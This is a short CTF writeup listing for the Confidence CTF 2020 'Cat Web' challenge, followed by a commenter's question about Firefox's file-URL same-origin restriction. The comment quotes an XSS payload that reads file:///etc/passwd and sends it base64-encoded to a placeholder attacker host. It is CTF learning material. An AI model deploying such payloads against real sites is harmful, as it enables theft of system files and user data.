Tags: ssrf directorylisting xss 

Rating:

Original writeup (https://d1r3wolf.blogspot.com/2020/03/confidence-ctf-2020-cat-web-challenge.html).
iv4nMarch 16, 2020, 6:23 a.m.

I noticed an issue:in FireFox,starting in Gecko 1.9, the file protocol's SOP restricts the files to be read must be in the same directory or in the sub directory

But I just test the challenge server:

```
file:///app/templates/index.html?grey","status":"ok","content":["\"><script>fetch('file:///etc/passwd').then(r=>r.text()).then(data=>fetch('http://IP/'%2Bbtoa(data)))</script>


iv4nMarch 16, 2020, 6:25 a.m.

(The content has been truncated)

It's ok to read /etc/passwd

The FireFox on chanllenge server is version 67,it should ban the request to file:///etc/passwd,so why?